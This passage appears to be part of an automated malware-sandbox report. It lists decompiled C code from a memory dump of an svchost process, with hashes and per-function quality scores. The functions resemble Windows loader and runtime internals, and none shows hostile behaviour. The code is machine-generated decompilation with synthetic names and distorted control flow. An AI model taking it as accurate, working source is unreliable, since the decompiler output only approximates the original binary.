				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E03AF88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E03A7D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x3b186c0; // 0x3401228
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x3b186b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E03A42280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E03AF88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E03A6AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x3b1b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x3b184c0;
										if(_t69 >=  *0x3b184c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E03AF9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E03A2922A(_t82);
							_t53 = E03A47D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E03AF8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x3b186c0; // 0x3401228
								if(__eflags != 0) {
									__eflags = _t82 -  *0x3b186b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x3b186bc;
										_t72 = 0x3b186b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E03A29240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x3b186c4;
									_t72 = 0x3b186c0;
									L18:
									E03A59B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                          0x03a29100
                                          0x03a29100
                                          0x03a29100
                                          0x03a29100
                                          0x03a29102
                                          0x03a29107
                                          0x03a2910c
                                          0x03a29110
                                          0x03a29115
                                          0x03a29136
                                          0x03a29143
                                          0x03a837e4
                                          0x03a837e4
                                          0x03a29149
                                          0x03a2914e
                                          0x03a2914e
                                          0x03a29117
                                          0x03a2911d
                                          0x00000000
                                          0x00000000
                                          0x03a2911f
                                          0x03a29125
                                          0x00000000
                                          0x03a29151
                                          0x03a29158
                                          0x03a2915d
                                          0x03a29161
                                          0x03a29168
                                          0x03a83715
                                          0x00000000
                                          0x03a2916e
                                          0x03a2916e
                                          0x03a29175
                                          0x03a29177
                                          0x03a2917e
                                          0x03a2917f
                                          0x03a29182
                                          0x03a29182
                                          0x03a29187
                                          0x03a29187
                                          0x03a2918a
                                          0x03a2918d
                                          0x03a2918f
                                          0x03a29192
                                          0x03a29195
                                          0x03a29198
                                          0x03a29198
                                          0x03a29198
                                          0x03a2919a
                                          0x00000000
                                          0x00000000
                                          0x03a8371f
                                          0x03a83721
                                          0x03a83727
                                          0x03a8372f
                                          0x03a83733
                                          0x03a83735
                                          0x03a83738
                                          0x03a8373b
                                          0x03a8373d
                                          0x03a83740
                                          0x00000000
                                          0x00000000
                                          0x03a83746
                                          0x03a83749
                                          0x00000000
                                          0x00000000
                                          0x03a8374f
                                          0x03a83751
                                          0x00000000
                                          0x00000000
                                          0x03a83757
                                          0x03a83759
                                          0x03a8375c
                                          0x03a8375c
                                          0x03a8375e
                                          0x03a8375e
                                          0x03a83761
                                          0x03a83764
                                          0x00000000
                                          0x00000000
                                          0x03a83766
                                          0x03a83768
                                          0x03a837a3
                                          0x03a837a3
                                          0x03a837a5
                                          0x03a837a7
                                          0x03a837ad
                                          0x03a837b0
                                          0x03a837b2
                                          0x03a837bc
                                          0x03a837c2
                                          0x03a837c2
                                          0x03a837b2
                                          0x03a29187
                                          0x03a29187
                                          0x03a2918a
                                          0x03a2918d
                                          0x03a2918f
                                          0x03a29192
                                          0x03a29195
                                          0x00000000
                                          0x03a29195
                                          0x00000000
                                          0x03a29187
                                          0x03a8376a
                                          0x03a8376a
                                          0x03a8376c
                                          0x03a8376c
                                          0x03a8376f
                                          0x03a83775
                                          0x00000000
                                          0x00000000
                                          0x03a83777
                                          0x03a83779
                                          0x00000000
                                          0x00000000
                                          0x03a83782
                                          0x03a83787
                                          0x03a83789
                                          0x03a83790
                                          0x03a83790
                                          0x03a8378b
                                          0x03a8378b
                                          0x03a8378b
                                          0x03a83792
                                          0x03a83795
                                          0x03a83795
                                          0x03a83798
                                          0x03a83798
                                          0x03a8379b
                                          0x03a8379b
                                          0x03a291a3
                                          0x03a291a9
                                          0x03a291b0
                                          0x03a291b4
                                          0x03a291b4
                                          0x03a291bb
                                          0x03a291c0
                                          0x03a291c5
                                          0x03a291c7
                                          0x03a837da
                                          0x03a291cd
                                          0x03a291cd
                                          0x03a291cd
                                          0x03a291d2
                                          0x03a291d5
                                          0x03a29239
                                          0x03a29239
                                          0x03a291d7
                                          0x03a291db
                                          0x03a291e1
                                          0x03a291e7
                                          0x03a291fd
                                          0x03a29203
                                          0x03a2921e
                                          0x03a29223
                                          0x00000000
                                          0x03a29223
                                          0x03a29205
                                          0x03a29208
                                          0x03a2920c
                                          0x03a29214
                                          0x03a29214
                                          0x03a291e9
                                          0x03a291e9
                                          0x03a291ee
                                          0x03a291f3
                                          0x03a291f3
                                          0x03a291f3
                                          0x03a291e7
                                          0x00000000
                                          0x03a291db
                                          0x03a29187
                                          0x03a29168

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c67721e3f114e2308c79873257a9d79bf45ec4d5e81b05cad640569e404c75d5
                                          • Instruction ID: fb6f4d6b66abd0cba2694cee048b35ac2586b1057994cc723798f03d4ec67e69
                                          • Opcode Fuzzy Hash: c67721e3f114e2308c79873257a9d79bf45ec4d5e81b05cad640569e404c75d5
                                          • Instruction Fuzzy Hash: 5731CE79A00294DFDB65EBADC588BAEBBB5BB49B14F18818FD4046B340C334A990CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A51DB5 Relevance: .1, Instructions: 87COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 60%
                                          			E03A51DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E03A4F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L03A44620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E03A4F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                          0x03a51dc2
                                          0x03a51dc5
                                          0x03a51dc7
                                          0x03a51dcc
                                          0x03a51dce
                                          0x03a51dd6
                                          0x03a51ddf
                                          0x03a51de0
                                          0x03a51de1
                                          0x03a51de5
                                          0x03a51de8
                                          0x03a51def
                                          0x03a51df0
                                          0x03a51df6
                                          0x03a51df7
                                          0x03a51dfe
                                          0x03a51e1a
                                          0x00000000
                                          0x00000000
                                          0x03a51e0b
                                          0x03a51e12
                                          0x03a51e12
                                          0x03a51e00
                                          0x03a51e00
                                          0x03a51e05
                                          0x03a51e1e
                                          0x03a51e23
                                          0x03a9570f
                                          0x03a95713
                                          0x00000000
                                          0x00000000
                                          0x03a95719
                                          0x03a95719
                                          0x03a51e2c
                                          0x03a51e2d
                                          0x03a51e2e
                                          0x03a51e2f
                                          0x03a51e31
                                          0x03a51e32
                                          0x03a51e35
                                          0x03a51e3d
                                          0x03a95723
                                          0x03a9573d
                                          0x03a9573d
                                          0x00000000
                                          0x03a95723
                                          0x03a51e49
                                          0x03a51e4e
                                          0x03a51e4e
                                          0x03a51e09
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                          • Instruction ID: f6afec3436b3c98118512710156066284f234cf34776ce21b14194147e205a78
                                          • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                          • Instruction Fuzzy Hash: 41218D36A40218AFDB21CF99CD80FBAFBB9EF85640F15405AFD019B210D634AE01C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A40050 Relevance: .1, Instructions: 81COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E03A40050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x3b1d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E03A59ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E03A6B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E03AF8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E03A59702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x3b1b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                          0x03a40055
                                          0x03a4005d
                                          0x03a40062
                                          0x03a4006c
                                          0x03a4006f
                                          0x03a40074
                                          0x03a4007a
                                          0x03a4007a
                                          0x03a40080
                                          0x03a40080
                                          0x03a40087
                                          0x03a4008d
                                          0x03a4008f
                                          0x03a40093
                                          0x03a40095
                                          0x03a4009b
                                          0x03a400f8
                                          0x03a400fb
                                          0x03a400fc
                                          0x03a400ff
                                          0x03a40108
                                          0x03a40108
                                          0x03a400a2
                                          0x03a400a6
                                          0x03a400b3
                                          0x03a400bc
                                          0x03a400c5
                                          0x03a400ca
                                          0x03a8c01e
                                          0x00000000
                                          0x00000000
                                          0x03a8c02d
                                          0x03a400d5
                                          0x03a400d9
                                          0x03a8c03d
                                          0x03a8c046
                                          0x03a8c046
                                          0x03a400df
                                          0x03a400e2
                                          0x03a400ea
                                          0x03a400ef
                                          0x03a400f2
                                          0x03a400f6
                                          0x03a40111
                                          0x03a40117
                                          0x03a40117
                                          0x00000000
                                          0x03a400f6
                                          0x03a400d0
                                          0x03a400d0
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f40e0cd403a486f47e203455b6f723e41b49366c5337ab973699dd316dee3d3
                                          • Instruction ID: e635b0798a32b86baea46d116feefee792fd9b3103234c37ac8f615871a96a7a
                                          • Opcode Fuzzy Hash: 0f40e0cd403a486f47e203455b6f723e41b49366c5337ab973699dd316dee3d3
                                          • Instruction Fuzzy Hash: 89318C35201B04CFD722DB28C940B96F3F5FF88714F18456EE99A8BB90EB75A801DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AA6C0A Relevance: .1, Instructions: 79COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E03AA6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E03A47D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x3b17b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L03A44620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E03A6F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E03A47D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E03A69AE0();
						_t23 = L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                          0x03aa6c0a
                                          0x03aa6c0f
                                          0x03aa6c10
                                          0x03aa6c13
                                          0x03aa6c15
                                          0x03aa6c19
                                          0x03aa6c1c
                                          0x03aa6c21
                                          0x03aa6c28
                                          0x03aa6c3a
                                          0x03aa6c2a
                                          0x03aa6c33
                                          0x03aa6c33
                                          0x03aa6c3f
                                          0x03aa6c48
                                          0x03aa6c4d
                                          0x03aa6c60
                                          0x03aa6c65
                                          0x03aa6c69
                                          0x03aa6c73
                                          0x03aa6c79
                                          0x03aa6c7f
                                          0x03aa6c86
                                          0x03aa6c90
                                          0x03aa6c94
                                          0x03aa6ca6
                                          0x03aa6cb2
                                          0x03aa6cbd
                                          0x03aa6cbd
                                          0x03aa6cc3
                                          0x03aa6cc7
                                          0x03aa6ccb
                                          0x03aa6cd0
                                          0x03aa6cd1
                                          0x03aa6ce2
                                          0x03aa6ce2
                                          0x03aa6c69
                                          0x03aa6ced

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 45772f10c2dbbbe51d26577e7c31d5650f463820717785c24d140f7061f1ec67
                                          • Instruction ID: c5ffb175fe83e5f388b4d9fc224b651dfb65e88d17acdc47a56e13bba069f1f7
                                          • Opcode Fuzzy Hash: 45772f10c2dbbbe51d26577e7c31d5650f463820717785c24d140f7061f1ec67
                                          • Instruction Fuzzy Hash: 14217C76600A44AFC715DF68D944E6AB7B8FF48740F18016AF904DB7A1D735E910CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A690AF Relevance: .1, Instructions: 76COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E03A690AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E03A7D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E03A5E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L03A44620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E03A6F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E03A5A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                          0x03a690af
                                          0x03a690b8
                                          0x03a690bb
                                          0x03a690bf
                                          0x03a690c2
                                          0x03a690c2
                                          0x03a690c8
                                          0x03a690cb
                                          0x03a690cd
                                          0x03aa14d7
                                          0x03aa14eb
                                          0x03aa14eb
                                          0x00000000
                                          0x03aa14eb
                                          0x03aa14db
                                          0x03aa14e6
                                          0x00000000
                                          0x03aa14f2
                                          0x03aa14e8
                                          0x00000000
                                          0x03aa14e8
                                          0x03a690d8
                                          0x03a690da
                                          0x03a690dd
                                          0x03a690e5
                                          0x00000000
                                          0x03a69139
                                          0x03a690fa
                                          0x03a690fe
                                          0x03a69142
                                          0x00000000
                                          0x03a69142
                                          0x03a69104
                                          0x03a69107
                                          0x03a6910b
                                          0x03a69110
                                          0x03a69118
                                          0x03a69147
                                          0x03a69148
                                          0x03a6914f
                                          0x03a69150
                                          0x03a69151
                                          0x03a69152
                                          0x03a69156
                                          0x03a6915d
                                          0x03a69160
                                          0x03a69168
                                          0x03a6916c
                                          0x03a691bc
                                          0x03a691be
                                          0x00000000
                                          0x03a691be
                                          0x03a6916e
                                          0x03a69173
                                          0x03a69176
                                          0x00000000
                                          0x00000000
                                          0x03a6917c
                                          0x03a69180
                                          0x03a691b5
                                          0x00000000
                                          0x03a691b5
                                          0x03a69182
                                          0x03a69185
                                          0x03a69189
                                          0x00000000
                                          0x00000000
                                          0x03a6918e
                                          0x03a69190
                                          0x03a69198
                                          0x00000000
                                          0x00000000
                                          0x03a691a0
                                          0x00000000
                                          0x03a691ad
                                          0x03a691ad
                                          0x03a691b0
                                          0x03a691b1
                                          0x00000000
                                          0x03a69185
                                          0x03a6911a
                                          0x03a6911c
                                          0x03a6911f
                                          0x03a69125
                                          0x03a69127
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                          • Instruction ID: 517bd435a0f2bc7951a5b7bb08b5bf97e0e35c0ddff51205ec9b4b5fc00afd88
                                          • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                          • Instruction Fuzzy Hash: 6B214CB6A00704EFDB20DF59C944EAAF7F8EB54750F1588AFE949AB250D730A9408B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A53B7A Relevance: .1, Instructions: 75COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E03A53B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x3b184c4; // 0x0
				_v12 = 1;
				_v8 =  *0x3b184c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L03A44620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x3b184c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E03A6AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E03A6FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x3b184c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x3b184c4; // 0x0
					L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                          0x03a53b89
                                          0x03a53b96
                                          0x03a53ba1
                                          0x03a53bab
                                          0x03a53bb5
                                          0x03a53bb9
                                          0x03a96298
                                          0x03a53bbf
                                          0x03a53bc2
                                          0x03a53bc3
                                          0x03a53bc9
                                          0x03a53bca
                                          0x03a53bcc
                                          0x03a53bcd
                                          0x03a53bd4
                                          0x03a53bd6
                                          0x03a53bdb
                                          0x03a53bea
                                          0x03a53bf7
                                          0x03a53bfb
                                          0x03a53bff
                                          0x03a53c09
                                          0x03a53c0a
                                          0x03a53c0b
                                          0x03a53c0f
                                          0x03a53c14
                                          0x03a53c18
                                          0x03a53c18
                                          0x03a53bfb
                                          0x03a53c1b
                                          0x03a53c30
                                          0x03a53c30
                                          0x03a53c3d

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ea94589e9dd86c3f0486c444b687a5bf37fc9ed162ff88c7114296f6207b1c31
                                          • Instruction ID: ce921a9903c2a39ebbfa7e2d84aeccee8810b9fce554126c5c8b2c58deefe748
                                          • Opcode Fuzzy Hash: ea94589e9dd86c3f0486c444b687a5bf37fc9ed162ff88c7114296f6207b1c31
                                          • Instruction Fuzzy Hash: 8C219F72A00208AFCB04DF58DE81B5AB7BDFF84748F1500AAEA08EB251D771ED05DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AA6CF0 Relevance: .1, Instructions: 74COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
